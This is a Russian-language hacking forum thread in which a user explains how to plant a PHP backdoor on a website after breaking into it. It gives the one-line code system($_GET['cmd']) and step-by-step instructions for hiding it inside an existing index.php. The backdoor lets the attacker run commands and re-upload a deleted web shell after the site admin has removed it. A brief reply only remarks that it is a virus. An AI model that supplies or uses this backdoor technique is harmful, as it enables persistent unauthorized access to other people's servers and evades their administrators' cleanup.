бэкдор и с чем его едят

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Вообщем думаю все сталкивались с проблемой когда вы заливали шелл и админ спалили вас и начал искать шеллы по фтп. ш вот когда админ находит последний шелл вы грызете логти и незнаете что делать...

Я вас познакомлю с бэкдорами, приведу только один пример простейшего бэкдора и его использование.

Код простейшего бэкдора:

Код:
<?php 
system($_GET['cmd']); 
?>

Код:
Бэкдор, backdoor (от англ. back door, чёрный ход) — программа или набор программ, которые устанавливает взломщик (хакер) на взломанном им компьютере после получения первоначального доступа с целью повторного получения доступа к системе. При подключении предоставляет какой-либо доступ к системе (как правило, это командный интерпретатор: в GNU/Linux — Bash, в Microsoft Windows NT — cmd). Бэкдор — особо важная составляющая руткита.
©Wikipedia

К примеру вы залили шелл(wso,r57,ak47 и т.д.)
шщем файлы php которые можно редактировать, к примеру нашли index.php
Редактируем его, у нас в index.php уже есть начало и конец php поэтому вставляем в начало перед <?php либо в конец перед ?> код бэкдора:

Код:
system($_GET['cmd']);

Обратите внимание ещё раз, код уже без <?php и ?> т.к. индекс файл уже имеет их.
Вставили код, сохранили и переходим на эту страницу.
Для примера возьму

Как видим ничего не произошло, всё есть как есть, так и должно быть. (К примеру админ удалил шелл, но вы отредактировали индекс и вставили бэкдор)

Теперь идем по этому адресу
Делаем вот такие глаза OO и видим список файлов в директории.
Чтобы узнать phpinfo нужно сделать такой запрос
ш самое главное, если у вас админ удалил шелл а вы занова его хотите залить делаете такой запрос:
(Обратите внимание пробел обязательно! Где site адрес сайта куда вы залили бекдор.)
Переходим потом по этому адресу и видим шелл.​
 

nevolaa

Пользователь
Регистрация
26 Июл 2011
Сообщения
43
Лайки
0
Баллы
0
это же вирус
 
Сверху